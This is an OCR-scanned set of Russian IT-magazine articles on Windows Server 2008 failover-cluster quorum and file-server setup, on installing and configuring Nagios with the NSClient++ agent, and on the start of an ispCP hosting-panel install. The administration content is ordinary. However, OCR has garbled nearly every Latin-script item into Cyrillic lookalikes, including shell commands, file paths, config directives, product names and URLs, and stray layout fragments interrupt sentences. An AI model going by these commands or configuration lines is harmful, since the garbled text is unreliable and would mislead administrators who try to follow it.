которые будут выдавать разную информацию. Воттогда и нуж- 
но определить, кому работать, а кому отключаться. Для этого 
нужен кворум (циогипп). Сервера, оставшиеся без кворума, 
автоматически закрывают все службы. 

Режим кворума определяет нужное количество голосов. 

В настройках ѴѴІп2к8 доступно четыре режима. Настрой- 
ка производится через меню Моге Асііопз — Сопбдиге 
Сіизіег ОиогитЭеШпдзна странице Эеіесі Оііогііт 
Сопіндигаіпоп: 

• ІМосіе Маргііу (большинствоузлов) —удобен при нечетном 
количестве узлов, одноузловом кластере или кластере без 
общего хранилища данных. Голоса назначаются только узлам, 
свидетель или диск-свидетель отсутствуют. Для кворума 
должно быть доступно более половины узлов. 

• ІМосІе апсі йізк Марплу (большинствоузлов и диск) — удобен 
при четном количествеузлов. Голоса имеют узлы и общие 
диски. Кворум может быть получен, если доступно более 50% 
узлов (или меньше, если естьдиск-свидетель). 

• ІМосІеапсІ РіІеБИаге Марплу (большинствоузлов и файловый 
ресурс) — каки предыдущий, только вместо диска-свидетеля 
используется файловый ресурс. Этот режим также рекомен- 
дуется при четном количествеузлов и кластере без общего 
хранилища данных. 

• МоМаргіІу: ОізкОпІу (без большинства:только диск) —для 
кворума нужен диск-свидетель, количество узлов на решение 
не влияет. Отсутствие диска свидетеля в любом случае означа- 
ет отсутствие кворума. 

При установке кластера будет выбран наиболее оптималь- 
ный вариант(выводится в окне Эиттагу). Менять кворум 
потребуется только при добавлении нового узла или других 
изменениях в структуре кластера. Режим «КІо-Маргку: йізк- 
Опіу» подписан, как не рекомендованный, и соответствует 
модели общего кворума в старой версии кластеров. Учитывая, 
что есть другие варианты, трудно назвать ситуацию, когда он 
можетбыть востребован. В зависимости оттекущей конфигу- 
рации, некоторые режимы могут быть также отмечены, как не 
рекомендуемые (поі гесоттепсіесі Іогуоигсиггепі питЬегоІ 
посіез). 

РАЗВЕРТЫВАНИЕ СЕРВИСА 

Теперь, когда кластер поднят и протестирован, приступаем к 
последнему этапу — развертыванию необходимого сервиса 
или службы, которую он будетобеспечивать. Выбранная 
роль на этот моментуже должна быть установлена. Хотя есть 
возможность создания пустого (етріу) сервиса: это можно 



Перед добавлением сервиса в кластер 



сделать из меню Моге Асбопз — Сгеаіе Егорку Зегѵісе ог 
Арріісабоп. Перед добавлением Рііе Зегѵег необходимо, зайдя 
в ЗЬгаде, убедиться, что дисковые ресурсы доступны кластеру. 
При необходимости можно добавить ранее не подключенные 
к кластерудиски: выбери в контекстном меню АсИ Оізк и укажи 
устройство хранения. По окончании работы мастера новый 
диск перейдет из категории І_осаІ Оізкз в СІизіегесІ Оізкз. 
Список поддерживаемых приложений доступен в меню 
Зегѵісез апсі Арріісаііопз. Нажми в области Асбопз ссылку 
Сопбдиге а Зегѵісе ог Арріісаііоп («Настроить службу или 
приложение») и на втором шаге НідЬ АѵаіІаЬІІІіу ѴѴІгагсІ 
укажи нужную роль или сервис. В нашем случае — это Рііе 
Зегѵег. Если выбранная роль еще не установлена, мастер 
прекращает работу. Далее введи стандартные параметры: 
имя файлового сервера, его ІР-адрес и тома, к которым 
нужно обращаться. По окончании работы мастера файловый 
сервер появится в дереве консоли Зегѵісез апб Арріісабопз. 
Выбираем его и в контекстном меню отмечаем пункт 
Ргоѵізіоп а ЗНагесІ Роібег ѴѴІгагсІ. Это вызовет одноименного 
мастера. Следуя его инструкциям, укажи параметры созда- 
ваемой общей папки: путь и имя, разрешения файловой 
системы и расширенные параметры протокола 5МВ (кэши- 
рование, число пользователей). После завершения мастера 
проверь работу файлового сервера. Затем переведи его в 
режим онлайн, выбрав в контекстном меню команду Вгіпд 
1Ыз зегѵісе огарріісабоп опііпе. 

Кстати, для тестирования корректности перехода на другой узел 
кластера необязательно выдергивать сетевой кабель. Достаточ- 
но перевести сервис в оффлайн, нажав в этом же меню ссылку 
МоѵеіЬіз зегѵісе огарріісабоп Іо а поШегпобе. В дальнейшем за 
работой файлового сервера можно следить из консолей Эегѵег 
Мападег, ЕаіІоѵегСІизІегМападетепі и Еѵепі Ѵіеѵѵег. 

Хотя мы рассмотрели только создание кластера для файло- 
вого сервера, — в остальных случаях (для почты, печати, ЭСП, 
ОНСР, еіс) принцип настройки будетаналогичен. 




> Ипкз 

Ознакомиться со 
списком всех измене- 
ний в Еаііоѵег Сіизіег 
можно в документе по 
адресу до.тісгозоД. 
сотЛѵѵІіпк/ 
?ЫпкІсі=62368 . 



МАСТЕРА ПОМОГУТ 

Сегодня создание отказоустойчивого кластера в ѴѴІп2к8уже 
нетребуетспециальныхзнаний от администратора. Нужно 
просто представлять себе конечный результат. Наличие 
множества мастеров и подсказок по ходу процесса заметно 
упрощают настройки и последующее управление. Думаю, у 
тебя все получится. Ш-И 
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СЕРГЕЙ «СПІШЕРІ» 

/ СПІЫОЕѴШІІА.ГМ / 



іАЯ 
СЛЕЖКА 



ЫА6І05: ПОПУЛЯРНАЯ СИСТЕМА МОНИТОРИНГА СИСТЕМ И СЕТЕЙ 




Задача проекта Ыа§іоз — разработать свободную систему мониторинга 
компьютерных систем и сетей. Система следит за узлами или службами и в 
случае возникновения проблем (например, служба не отвечает) оповещает 
администратора. Постоянное наблюдение за всеми компонентами позволит 
выявить проблемные участки и устранить их прежде, чем произойдет сбой, 
или они смогут повлиять на работу сети. 



ЗА ЧТО АДМИНЫ ЛЮБЯТ ЫА6І05 

Ыадіоз производит мониторинг работы большинства сетевых сервисов: 
5МТР, РОРЗ, I МАР, 55Н, Теіпеі;, РТР, НТТР, РЫ5 и многих других. Также 
с его помощью можно отслеживать использование ресурсов серверов: 
загруженность процессора, расходование оперативной памяти, дискового 
пространства ит.д. — причем, не только в ІІпіх, но и в других ОС. Например, 
мониторинг работы серверов под управлением ѴѴІпсіоѵѵб обеспечивается 
модулем ЫРРЕ_І\ІТ. 

Возможен удаленный мониторингчерез шифрованные 55Н- или55І_-тун- 
нели. Простая архитектура модулей расширений позволяет создавать свои 
способы проверки служб и обработчики событий (к примеру, перезапуск 
зависшего сервиса). Концепция «родительских»узлов дает возможность 
определить иерархию и зависимости между хостами. Таким образом можно 
отличать действительно неработающие узлы оттех, которые недоступны 
системе мониторинга из-за неполадок на промежуточных пунктах. Ыадіоз 
ценятза умение строить карты сетевой инфраструктуры и графики различ- 
ных параметров наблюдаемых систем. 

Проект возник в 2002 году, хотя первое время он был известен как ЫеіЗаіпі 
Его лидером является программист Этан Галстад. Само слово ЫадіоБ, по 
информации на сайте ѵѵѵѵѵѵ. падіоз .о п , — это рекурсивный акроним, кото- 
рый расшифровывается, как Ыадіоз АіпІ Ѳоппа іпбібі Оп ЗаіпіЬоосІ («Ыадіоз 
не собирается настаивать на святости») — намек на предыдущее название 
проекта. Функциональность расширяется за счет плагинов и аддонов, 
большая часть из которых доступна на странице закачки. 

Сейчас предлагается две ветки продукта: 2.x и 3.x. В последней нетолько 
исправлены найденные ранее ошибки, добавлены новые макросы и многое 
другое, но, что важно, пересмотрен алгоритм сканирования, с цельюуст- 
ранитьодин из главных недостатков этой системы — медлительность при 
проверке больших сетей. В 2.x всетесты проходят практически последова- 



тельно, а в новой редакции задачи выполняются параллельно. Хотя вторая 
версия еще развивается, очевидно, что в будущем все силы будутброшены 
на третью ветку. Поэтому, хотя отличия в настройках незначительны, даль- 
ше речь пойдет именно о ней. 

УСТАНОВКА №6105 

Установку будем производить в ІІЬигйи. В других дистрибутивах процесс 
полностью аналогичен, за исключением начального этапа —установки 
зависимостей. Поиск в репозитарии командой: 

$ зисіо арі-сасііе зеагсіі падіоз 

— выдаст ряд пакетов. В этом списке присутствуют обе версии Ыадіоз 
(пакеты 2-ой версии называются падіоз2). В репозитарии не всегда самая 
свежая версия, поэтому будем ставить из исходников. 

Если еще неустанавливался компилятор и прочие необходимые инстру- 
менты, то ставим метапакет ЬиіШ-еБзепйаІ. Для просмотра статистики 
Ыадіоз нам понадобится веб-сервер и графическая библиотека 6й2 (она 
нужна для динамической работы с изображениями): 

$ зисіо арД-деО іпзДаІІ арас!іе2 1іЬдс12-хрт-с1еѵ 
$ зисіо арД-деД іпзДаІІ ЬиіІсі-еззепДіаІ 

Перед компиляцией Ыадіоз следует создать специального пользователя и 
группу, от имени которых он будет работать. Если этого не сделать, Ыадіоз 
собрать не удастся. 

$ зисіо изегаскі -ш падіоз 
$ зисіо раззжі падіоз 
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Ыадіов в работе 



Создаем учетные записи 



В некоторыхдистрибутивах при создании нового пользо- ССІ ШЬ: Ьккр : //ІосаІкозк/падіоз/сді-Ъіп/ 

вателя автоматически создается группа стаким же именем. 

Проверяем, так л и это: Теперь компилируем: 



$ дгер падіоз /еРс/дгоир 
падіоз :х: 1001: 

Если вывод ничего не показал, добавляем вручную: 

$ зисіо изегтосі -С падіоз падіоз 

Группа падстб необходима для управления настройками 
через веб-интерфейс. В нее должна быть включена учетная 
запись веб-сервера (в ІІЬипІи — ѵѵѵѵѵѵ-сіаіа ] и пользователь 
падіоз: 

$ зисіо дгоирасісі падсшсі 
$ зисіо изегтосі -С падсшсі падіоз 
$ дгер -і изег /екс/арас1те2 /епѵѵагз 
ехрогР АРАСНЕ_КШ_и8ЕК=ѵ\плм-сіака 
$ зисіо изегтосі -С падсшсі ѵмѵплг-сіаОа 

Теперьзаходим на страницу ѵѵѵѵѵѵ.падіоз.огд/боѵѵпіоаб и ска- 
чиваем последние версии Ыадіоз и плагины (Ріидіпз). Кроме 
стабильных версий, можно скачать последний СѴ5-срез, но 
это, пожалуй, больше для экспериментаторов. Плагины также 
можно скачать со специального сайта падіозріидіпз.огд . Здесь 
же доступна и ссылка на страницу с аддона ми [ ѵѵѵѵѵѵ.падіоз. 
огд/боѵѵпІоаб/аббопБ І. Для установки они не нужны, но могут 
впоследствии понадобиться при настройке мониторинга 
некоторых сервисов. Распаковываем полученные архивы и 
конфигурируем: 

$ Саг хгі падіоз -3 .0.3. Саг . дг 
$ ссі падіоз-3 .0.3 

$ . /сопіідиге --ѵ\гікк-соттапсі-дгоир=падстсі 

По окончании процедуры конфигурирования будет выведена 
таблица настроек. Убедись в том, что все нужное найдено и 
параметры верны: 

Оепегаі Оркіопз: 



$ таке аіі 

По окончании сборки будет выдан список команд для установ- 
ки различных компонентов №діоз. Ставим все: 

$ зисіо таке іпзкаіі 
$ зисіо таке іпзкаіі-іпік 
$ зисіо таке іпзкаіі-сопіід 
$ зисіо таке іпзкаіі-соттапсітосіе 
$ зисіо таке іпзкаІІ-члгеЪсопі 

После выполнениятретьей команды в каталог /изг/іосаі/ 
падіоз/екс/ будут скопированы примеры конфигураци- 
онных файлов (сді . сід, падіоз. сід, гезоигсе . сід). 
Команда «таке іпзкаІІ-^еЬсопі» создаст файл /екс/ 
араске2/сопі . сі/падіоз . сопі, необходимый для работы 
с веб-сервером Арасбе. Чтобы получить возможность регис- 
трироваться через веб-интерфейс, при помощи .Ъкраззѵгсі 
создадим учетную запись падіозабтіп: 

$ зисіо ккраззжі -с /изг/іосаі/падіоз/екс/ 
ккраззжі. изегз падіозасітіп 

Перезапускаем апач командой: 

$ зисіо /екс/іпік . сі/арас]те2 геіоасі 

После установки в каталог /екс/іпік . сі/ будетпомещен 
скрипт для запуска Ыадіоз. Обеспечим его автоматическую 
загрузку при старте системы: 

$ зисіо 1п -з /екс/іпік . сі/падіоз /екс/гсЗ. 
сі/399падіоз 

Установка плагинов, в общем-то, стандартна: 

$ Саг хгі падіоз -ріидіпз -1 . 4 . 12 . Саг . д 2 
$ ссі падіоз-ріидіпз-і .4.12 




> ІП^О 

• Мадіоз — программа 
с открытым ИСХОДНЫМ 
кодом. 

• Проект предназна- 
чен для мониторинга 
компьютерных систем 
и сетей. Он следитза 
указанными узлами и 
службами и оповеща- 
ет администратора в 
случае, если какие-то 
из служб прекращают 
(или возобновляют) 
свою работу. 

• Под мониторингом 
сети понимают посто- 
янное наблюдение за 
компьютерной сетью 
в поисках медленных 
или неисправных 
систем. О сбоях сете- 
вому администратору 
сообщается с помо- 
щью почты, пейджера 
или других средств 
оповещения. 



Ыадіоз ехесикаЫе: падіоз 
Ыадіоз изег/дгоир: падіоз , падіоз 
Соттапсі изег/дгоир : падіоз , падсшсі 

Ѵ7еЪ Іпкег^асе Оркіопз: 

НТМЬ ІЖЬ : Ьккр: //Іосаііюзк /падіоз/ 



Есть и другие опции конфигурирования, но нам подходят 
установки поумолчанию: 

$ . /сопкідиге --ѵг ікк-падіоз-изег=падіоз - 
— ■ міЫт-падіоз-дгоир=падіоз 
$ таке 



• Первые версии 
Ы5С[іеп1;++ были 
написаны еще для 
ЫеіБаіпк 
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> Ипкз 

• В качестве стар- 
тового документа по 
установке Ыадіоз и 
первичной настройке 
могу порекомендовать 
Оиіскзіагі Іпзіаііаіоп 
Ѳиісіез [ падіоз.зіпеі:/ 
сіосз/З 0/ди іскзіа гі:. 
Щщі]. 

• Полное описание 
всех возможных 
параметров конфи- 
гурационных файлов 
ищи в документации 
Ыадіоз [ падіоз.зіпеі/ 
сіосз/З 0 ). 

• Сайты ѵѵѵѵѵѵ. 
падіозсогптипііу.огд 
и ѵѵѵѵѵѵ. падіозіогде.огд 

содержат большое 
количество ссылок на 
документацию, допол- 
нительные инструмен- 
ты и другие ресурсы по 
Ыадіоз. 




> ѵѵагпіпд 

В целях безопаснос- 
ти на файлы ресурсов 
и объектов лучше 
установить права 600 
или 660. 



$ зибо таке іпзіаіі 

Теперь к первому запуску Мадіоз все готово. Конфигурацион- 
ные файлы уже настроены на мониторинг локальной системы. 
Проверяем конфиг: 

$ зисіо /изг/ІосаІ/падіоз/Ьіп/падіоз -ѵ /изг/ 
Іосаі/падіоз/еіс/падіоз . сід 
Тоіаі Ѵ/агпіпдз : О 
Тоіаі Еггогз : О 

ТМпдз Іоок окау — N 0 зегіоиз ргоЫешз ѵѵеге 
беіесіесі сіигіпд Оке рге-ііідкі скеск 

Запускаем Ыадіоз командой «зисіо /еіс/іпіі . сі/падіоз 
зіагі». Какое-то время будетзатрачено на сбор параметров 
локальной системы. Чтобы их просмотреть, при помощи веб- 
браузера заходим по адресу, подсказанному при установке 

— ЬкрУЛосаІЬозі/падіоз . Вводим логин падіозасітіп и пароль. 
Несмотря на отсутствие локализации, разобраться с веб-ин- 
терфейсом легко. 

КОНФИГУРАЦИОННЫЕ ФАЙЛЫ ЫА6І05 

Какотмечалось выше, после установки Ыадіоз появится 
несколько конфигурационных файлов. Основной конфиг, 
содержащий большое количество директив, которые демон 
считывает при запуске, называется падіоз .сід. Этот файл 
ссылается еще на дватипа файлов. В файлах ресурсов содер- 
жатся пользовательские макросы, втом числе и пароли для 
доступа кобъектам. Эту информацию специально разместили 
отдельно, чтобы не было возможности получить к ней доступ 
из С6І. В целях безопасности на такие файлы устанавлива- 
ются права 600 или 660. Поумолчанию файл ресурсов один 

— гезоигсе .сід. Использовав директиву гезоигсе_іі1е 
в падіоз . сід, можно добавить любое их количество. Объек- 
ты, то есть все элементы, участвующие в мониторинге и опове- 
щении (узлы, сервисы, контакты, команды ит.д.), описываются 
файлами определения объектов (ОЬІесІ Оеііпіііоп Рііез). За 
счетсід_іі1е можно прописать несколько таких файлов, но 
для удобства вместо отдельных файлов используют директиву 
сід_біг. С ее помощью можно указать Ыадіоз на каталог, где 
он будет искать файлы с описаниями объектов. Послеустанов- 
ки в /изг/іосаі/падіоз/еіс/ будет создан подкаталог 
обіесіз с примерами таких файлов. И, наконец, файл сді . сід 
содержит настройки С6І. 

Параметров в падіоз . сід и сді . сід довольно много, но 
часто их назначение — очевидно. Полное описание всех пара- 
метров конфигурационных файлов можно найти в докумен- 
тации Ыадіоз [ падіоз.зіпеі/сІосз/З 0 ]. Файл ресурсов очень 
прост. Наибольший интерес представляют объектные файлы. 




Чтобы пример сделать интереснее, настроим мониторинг 
удаленного сервера, работающего под управлением ѴѴІпсІоѵѵз. 

МОНИТОРИНГ ѴУІ№0ѴѴ5-СИСТЕМ 

В подкаталоге обіесіз есть готовые шаблоны объектных фай- 
лов для большинства случаев. В качестве шаблона настройки 
возьмем ѵ^іпсіоѵѵз . сід. Подключаем его, сняв комментарий 
в падіоз . сід: 

сід_іі1е=/изг/1оса1/падіоз/еіс/окф есіз/ 
ѵѵіпсіоѵѵз . сід 

Теперь открываем ѵѵіпсіоѵѵз . сід и правим: 

$ зисіо папо/изг/ІосаІ/падіоз/еІс/оЬіесІ5/ѵѵіпсіоѵѵ5.с^д 

# Описание узла (ІР адрес, имя) 
сіеііпе козі{ 

; Наследование дефолтных значений из шаблона 
изе ѵѵіпсіоѵѵз -зегѵе г 
козі_паше зегѵегОІ 
аііаз Міпсіоѵѵз Зегѵег 
асМгезз 192.168.1.20 

} 

# Описание контролируемых сервисов 
сіеііпе зегѵісе{ 

изе депегіс-зегѵісе 
козі_паше зегѵегОІ 

зегѵісе_сіезсгірііоп ЫЗС1іепі++ Ѵегзіоп 

# Команда для проверки 
скеск_соттапсі скеск_пі ! СЫЕИТУЕКЗЮИ 

} 

# Контроль загрузки процессора 
сіеііпе зегѵісе{ 

изе депегіс-зегѵісе 
козі_паше зегѵегОІ 
зегѵісе_безсгірііоп СРЮ Ьоасі 
скеск_соттапсі скеск_пі ! СРНЬОАБ ! - 1 5,80,90 

} 

# Расход оперативной памяти 
сіеііпе зегѵісе{ 

изе депегіс-зегѵісе 
козі_паше зегѵегОІ 
зегѵісе_безсгірііоп Метогу Юзаде 
скеск_соттапсі скеск_пі ШЕМЮЗЕ ! -ѵѵ 8 0 -с 9 0 

} 

# Чтобы добавить контроль конкретного сервиса 
(например Ехріогег) , используем конструкцию: 
сіеііпе зегѵісе{ 

изе депегіс-зегѵісе 
козі_паше зегѵегОІ 
зегѵісе_безсгірііоп Ехріогег 
скеск_соішпапсі скеск_пі ! РКОСЗТАТЕ ! -б ЗНО^АЬЬ 
-1 Ехріогег. ехе 
} 

Описание параметров можно найти вуказанном файле и кон- 
фиге клиента (о нем чуть ниже). Теперь на сервер под управ- 
лением ѴѴІпсІоѵѵз необходимо установить программу-клиент 
Ы5СІІепІ++. На страницедля закачки зіпеі/ргоіесіз/пзсріиз 
можно слитьгір-архив или установочный файл. Обрати вни- 
мание, что для 32- и 64-битных систем берутся разные файлы. 
Установка тзі-файла стандартна — в случае гір-архива его 
нужно распаковать, а затем, перейдя в этот каталог, ввести в 
окне терминала две команды: 
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> пзс1іепб++ /іпзбаіі 

> пзс1іеп1: + + ЗузТгау 

После этого в консоли «Службы» появится новый сервис. Вызываем окно 
свойств, переходим на вкладку «Вход в систему» и взводим флажок«Раз- 
решить взаимодействие с рабочим столом». Запустить ее можно, введя в 
терминале: 

> пзс1іеп1: + + /збагб 

Ахтунг! Перед запуском измени параметры в конфигурационном файле 
ЫЗС.Іпі, который находится в подкаталоге, где установлен Ы5СІІепі++. 
Несмотря на то, что параметров внутри много, зачастую достаточно просто 
снять комментарии. 

ФАЙЛ М5С.ШІ 

[тобиіез] 

# Снимаем ремарки с нужных модулей 

# (есть и другие, но они пока находятся в стадии тестиро- 
вания) 

ЕіІеЬоддег . 611 
СЬескЗузбет. сЗ.11 
СЬескБізк . сЗ.1 1 
ЫЗСІіепкЬізкепег . сЗ.1 1 
МКРЕПізбепег . 611 
ЗузТгау . сП.1 
СкескЕѵепкЬод . сЗ.1 1 
СПескНеІрегз . сЗ.11 
СЬескѴШІ . сііі 
[Зеккіпдз] 

# Пароль для доступа 
раззѵ\гагб=зесгеб-раззѵ\гогб 

# Узел или узлы, которым разрешено подключение 
а11сжеб_]тозбз = 192 .168.1.100 

ШЗСІІепб ] 

# Порт, на котором будет работать ЫЗСІіепбЬізбепег . 611 
рогб=12489 

Если был установлен пароль доступа к клиенту Ы5СІІепі:++, то следует изме- 
нить команду для подключения. Команды описываются в файле со 
с(о . Поумолчанию онуже подключен в падіоБ.сбд, но не поленись прове- 
рить, так ли это. 

сбд_бі1е=/изг/1оса1/падіоз/ебс/оЬд есбз/соттапбз . сбд 

Для считывания данных и передачи их серверу используется пла- 
гин сПеск_пР, входящий в стандартную поставку Ыадіов. Открываем 
соттапбз . сбд и приводим запись сПеск_п{: к следующему виду, указав 




после параметра 1 -зм 1 пароль для доступа. 

$5ис1опапо/и5г/ІосаІ/падіо5/е(с/оЬіес(5/соттапсІ5.с!д 

бебіпе соттапсЦ 
соттапб_пате сПеск_пб 

соттап6_1 іпе $ІІЗЕКІ$/с]зеск_пб -Н $НОЗТАВБКЕЗЗ$ -р 12489 \ 
-з зесгеб_раззѵ\гогб -ѵ $АКС1$ $АКС2$ 

} 

Потрать время на изучение этого файла! Это снимет ряд вопросов отом, как 
работает Ыадіов. После всех изменений проверяем конфиги и перезапус- 
каем Ыадіоз: 

$ зибо /изг/1оса1/падіоз/Ьіп/падіоз -ѵ /изг/іосаі/ 
падіоз/ебс/падіоз . сбд 
$ зибо /ебс/іпіб . б/падіоз геіоаб 

Теперь программа проведет сбор информации, после чего данные будут 
доступны через веб-интерфейс. 

ОТПРАВКАОПОВЕЩЕНИЙ 

Как уже было сказано, N ад іов может не только собирать статистику, ной 
оповещать при возникновении проблем. Две команды побіу-ЬозІ-Ьу-етаіІ 
и побІу-зегѵісе-Ьу-еппаіІ, описанные в соттапсІ5.сі : д, позволяют отсылать 
предупреждения на е-таіі. Но чтобы они работали, в ІІЬипіи необходимо 
установить пакет таііх и изменить путь в описании с /Ып/таіі на/ 
изг/Ьіп/таіІ (или сделать соответствующий симлинк). Куда отправлять 
сообщение, описывается в файле сопбасбз . сбд. 

$ біісіо папо /изг/іосаі/падіоз/еіс/оьіесіз/сопіасіз.с^д 

бебіпе сопРасЩ 

сопбасб_пате падіозабтіп 
аііаз Ыадіоз Абшіп 

# Период оповещения 
зегѵісе_побібісабіоп_регіоб 24x7 
ЬозЦ_по1іібісаЦіоп_регіоб 24x7 

# Параметры состояния объектов и = ипкпоѵлі (неизвест- 
ное) , ™ = магпіпд (предупреждение) , с = сгібісаі (крити- 
ческое) , г = гесоѵегіез (восстановлено) , б = старт/стоп, 
п = попе (отключение уведомлений) 

зегѵісе_побібісабіоп_орбіопз м,и, с , г 
Позб_побібісабіоп_орбіопз б, и, г 

# Тип оповещения из соттапбз . с 6 д 
зегѵісе_побібісабіоп_сошшапбз побібу-Ьу- 

ешаіі , побібу-Ьу-ерадег 

Ьозб_побібісабіоп_сошшапбз Позб-побібу-Ьу- 
ешаіі , Позб-побібу-Ьу-ерадег 

# Адреса 

ешаіі падіоз@бошаіп . сот 
радег падіоз@ботаіп . сот 
аббгеззі 11111111@ісд. сот 

} 

Можно определить пользователей, которым будут отправляться оповеще- 
ния о работе конкретныхтипов серверов или сервисов. Для этого исполь- 
зуются контактные группы (сопбасбдгоирз . сбд). Не забудь проверить, 
чтобы файл был подключен в падіоз . сбд. 

ЗНАКОМСТВО СОСТОЯЛОСЬ 

Возможностей Ыадіоз столько, что на описание всех не хватит и книги. 
Наверное, Ыадіоз не очень удобен для мониторинга единичного компью- 
тера или сервиса, но его потенциал полностью раскрывается в средних и 
больших сетях со сложной структурой. Это как разтот случай, когда следует 
познакомиться с ним поближе, т 
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Незаменимый 

помощник 

ХОСТЕРА 



І5РСР: РЕШЕНИЕ ДЛЯ УПРАВЛЕНИЯ ДОСТУПНЫМИ РЕСУРСАМИ И СЕТЕВЫМИ СЕРВИСАМИ 



Управление хостингом, даже при тщательно спланированной архитектуре 
и кропотливом выборе компонентов, кажется простым только на первый 
взгляд. По мере увеличения виртуальных пользователей следить за всем бу- 
дет труднее на порядок. Все больше времени придется тратить на админис- 
трирование. Упростить эту задачу помогут специализированные решения 
вроде ізрСР. 



остинг хостингу рознь, но раздача места на сервере может 
показаться стандартной и легко решаемой (ручной прав- 
кой конфигов или с помощью скриптов) только поначалу. 
Задач у хостера много: необходимо выделять и квотировать 
место на РТР- и ѴѴеЪ-серверах, управлять субдоменами и БЫЗ-запися- 
ми, следить за использованием трафика и установленными лимитами, 
создавать учетные записи почтового сервера, администрировать базы 
данных. Также нужно не забыть про резервное копирование, борьбу 
со спамом и вирусами. Конечно, шаблоны и скрипты могут упростить 
работу, но каждое изменение конфигурации, например, добавление 
еще одного почтового адреса для субдомена, потребует вмешательства 
специалистов и денежек. Выход один — использовать программы, 
упрощающие управление виртуальным хостингом! У таких решений 
понятный графический интерфейс, и ориентированы они на обычного 
юзверя. Администратор или менеджер создают новых реселлеров и 
пользователей, параллельно активируя нужные им ресурсы: объем мес- 
та под сайт и РТР, количество поддоменов, почтовых адресов и СУБД. 
Остальными параметрами (логины, пароли и т.д) управляют уже сами 
пользователи. Им предлагается упрощенная панель. 

По запросу «Ьозйп^» на сайте ітезішіеатпеі: нам предложат 170 ссылок. 



Однако под нашу задачу подходит всего десяток-другой проектов, да и 
то — лишь несколько обновляются регулярно. Тем не менее, оптималь- 
ную панель управления хостингом найти можно. Среди коммерческих 
— это СРапеІ, БігесгАсІтіп, Ріезк. Присутствуют и свободные продукты 
— доступные на халяву. Кроме лицензии, нужно внимательно ознако- 
миться с поддерживаемыми сервисами, которыми можно управлять 
при помощи этой панели. К сожалению, универсального решения на 
все случаи жизни не существует. Опыт показывает: чем больше проект 
поддерживает сервисов, тем больше вероятность, что с установкой 
придется повозиться. Еще один момент, на который следует обратить 
внимание — доступность локализованного интерфейса. На момент 
написания этих строк проблем с локализацией не было в ЗузСР, БТС, 
ѴНС5, ізрСР. Есть средства для локализации в І5РСопй§, но в последней 
стабильной версии 2.2.25 русификации придется уделить несколько 
больше времени, чем у конкурентов. Третья ветка І5РСопй§, находяща- 
яся в стадии активной разработки, с великим и могучим пока не дружит. 
Хотя система предлагает удобный интерфейс для локализации и при 
знании базового английского, потратив всего пару часов, легко сделать 
это самостоятельно. По моему мнению, самым простым в установке и 
настройке является ізрСР — поэтому дальше речь пойдет именно о нем. 
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При установке отдельных пакетов необходимо ответить на ряд вопросов 



ПАНЕЛЬУПРАВЛЕНИЯ ХОСТИНГОМ І5РСР 

Проект ізрСР (ізр Сопітоі Рапеі, уѵм/м/.ізр -сопітоі. пеГ) возник в марте 
2007 года как форк ѴНС8 (Ѵігшаі Нозгіп^ Сопітоі Рапеі, ѵЬсз.пек) . Пос- 
ледний представляет собой довольно мощное и удобное в работе ре- 
шение, но, к сожалению, давно не обновлялся. Он содержит множество 
ошибок, в том числе связанных с безопасностью, и использовать его не 
стоит. Тем более, ему есть замена в виде ізрСР. Кстати, настройки ѴНСЗ 
можно перенести в ізрСР, правда, вручную. 

Задача ізрСР аналогична родительской — предоставить админист- 
раторам удобный интерфейс для управления виртуальными узлами. 
Используя эту хостинг-панель, можно управлять настройками Арасйе2 
сРНРБ, ВіпсІ9, МуЗС^Ь, Соигіег, Ргостаіі, Розіііх, Розі^геу, РгоЕТРб, 
АѴѴЗіаіз, іріаЫез, Зазі, гкЬитег и некоторыми другими. 
Поддерживается три вида учетных записей (традиционных для 
подобных инструментов) : администраторы, реселлеры и пользовате- 
ли. Интерфейс администраторов позволяет создавать новые учетные 
записи, указывать квоты, доступные ресурсы и т.д. Реселлер может 
создавать пользователей и передавать (если точнее, — продавать) им 
часть «своих» ресурсов. 

Исходный код доступен под лицензией СЖІ СРЬ ѵ2. Для локализации 
используется СИИ ^ейехі. Интерфейс в настоящее время переведен на 
28 языков, в том числе и русский. Текущее состояние перевода можно 
узнать по адресу ѵгтм. ізр-сопітоі .пеі/ізрср Аѵікі /ігапзіайопз . Докумен- 
тацией проект еще только начинает обрастать, недостаточно потра- 
тить на изучение ізрСР час, и необходимость в ней уже отпадает. 

УСТАНОВКА І5РСР 

Минимальные требования значатся такие: компьютер с процессором 
класса Решіит III 500 МГц, ОЗУ 256 Мб, 100 Мб свободного места на 
диске для установки. В процессе инсталляции понадобится подклю- 
чение к интернету. Последняя версия (на момент написания статьи 
— 1.0.0 КС6) без проблем ставится на СепЮ5, КебНаЦ Ребога, ПеЪіап, 
іЛэипш, 51І5Е, орепЗІІЗЕ, Зіаскѵѵаге, Сепіоо, РгееВЗБ и ОрепВЗБ. 

Для этих систем в подкаталоге . /босз/$УоигЗузкет/$Зузкет- 
раскадез, в архиве с исходными текстами, уже есть готовые устано- 
вочные скрипты. Вполне вероятно, ізрСР можно заставить работать и в 
других дистрибутивах, — займет это лишь чуть больше времени. 

Сам процесс упрощен даже по сравнению с ѴНСЗ. Обновляем систему: 

$ арк-дек ирбаке && арк-дек ирдгабе 



Эиі'.гіЕаСи - ЖС8СМ0 
Ѵчгііет ж 1.0. § Ш ЖѢ* * 

■ Ргія 
рІШ Т_ІН|М_І№Ѵ^ г 

Н*^_К№СЫЦЕ * 

- от.а.и \ 

ВНЕГ^ІІЕКіГЙ * 

* ^ѵлг/ гшу 1ір*:р . Ікк 



Конфигурационный файл ізрср.сопі 



Скачиваем архив с сайта проекта и распаковываем его: 

$ каг х^'ѵк ізрср-ошеда-1 . О . 0-гсб . каг . Ьг2 
$ ссі . /ізрср-отеда-1 . О . О 

Для ЦЬипш 8.04 ЬТЗ используем такую команду: 

$ зисіо арк-дек іпзкаіі $(сак . /босз/бЪипки/иЪипки- 
раскадез-багбу ) 

В процессе установки пакетов будут запрашиваться параметры отде- 
льных сервисов: 

• при установке Соигіег на вопрос «Сгеаіе бігесіогіез Іог ѵѵеЪ-Ъазеб 
абтіпізітаіііоп?» отвечаем «N 0 »; 

• при установке Розіііх выбираем «интернет-сайт»; 

• при установке РгоЕТРб выбираем «Зіапбаіопе»; 

• при установке гооікііішпііег везде выбираем «Уез». 

Можно заглянуть в файл сопкідз/иЪипки/ізрср . сопк и 
подправить ряд переменных. Но в большинстве случаев поин- 
тересоваться имеет смысл уже после установки и настройки. 
Компилируем: 

$ зисіо таке іпзкаіі 

Копируем все файлы из временного каталога в корень: 

$ зисіо ср -Кѵ /ктр/ ізрер/* / 

Далее нам понадобится рутовский терминал (через зибо выполнить 
нижеследующие команды нельзя) : 

